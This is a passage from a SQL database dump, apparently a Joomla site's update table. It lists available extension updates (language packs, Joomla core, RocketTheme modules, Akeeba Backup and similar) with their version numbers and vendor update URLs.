/el-GR_details.xml','',''),(17785,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17786,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17787,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17788,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17789,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17790,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17791,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17792,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17793,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17794,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17795,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17796,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17797,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17798,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17799,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17800,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17801,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17802,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17803,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17804,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17805,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17806,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17807,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17808,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17809,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17810,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17811,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17812,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17813,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17814,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17815,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17816,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17817,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17818,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17819,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17820,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17821,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17822,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17823,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17824,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17825,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17826,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17827,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17828,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17829,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17830,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17831,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17832,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17833,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17834,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17835,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17836,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17837,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17839,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17840,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17841,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17842,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17843,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17844,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17845,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17846,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17847,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17848,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17849,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17850,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17851,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17852,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17853,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17854,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17855,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17856,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17857,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17858,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17859,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17860,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17861,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17862,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17863,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17864,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17865,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17866,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17867,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17868,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17869,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17870,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17871,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17872,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17873,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17874,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17875,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17876,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17877,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17878,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17879,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17880,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17881,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17882,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17883,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17884,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17885,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17886,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17887,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17888,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17889,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17890,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17891,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17892,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17893,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17894,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17895,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17896,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17897,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17898,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17899,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17900,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17901,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17902,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17903,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17904,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17905,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17906,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17907,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17908,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17909,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17910,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17911,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17912,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17913,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17914,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17915,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17916,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17917,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17918,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17919,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17920,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17921,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17922,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17923,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17924,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17925,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17926,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17927,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17928,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17929,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17930,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17931,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17932,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17933,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17934,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17935,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17936,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17937,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17938,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17939,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17940,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17941,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17942,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17943,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17944,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17945,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17946,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17947,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17948,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17949,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17950,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17951,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17952,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17953,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17954,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17955,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17956,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17957,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(17958,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(17959,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(17960,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(17961,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(17962,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(17963,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(17964,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(17965,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17966,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17967,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17968,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17969,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17970,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17971,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17972,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17973,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17974,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17975,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17976,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17977,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17978,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17979,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17980,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17981,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17982,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17983,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17984,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17985,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17986,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17987,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17988,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17989,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17990,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17991,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17992,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17993,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17994,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17995,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17996,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17997,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17998,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17999,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18000,57,0,'Serbian 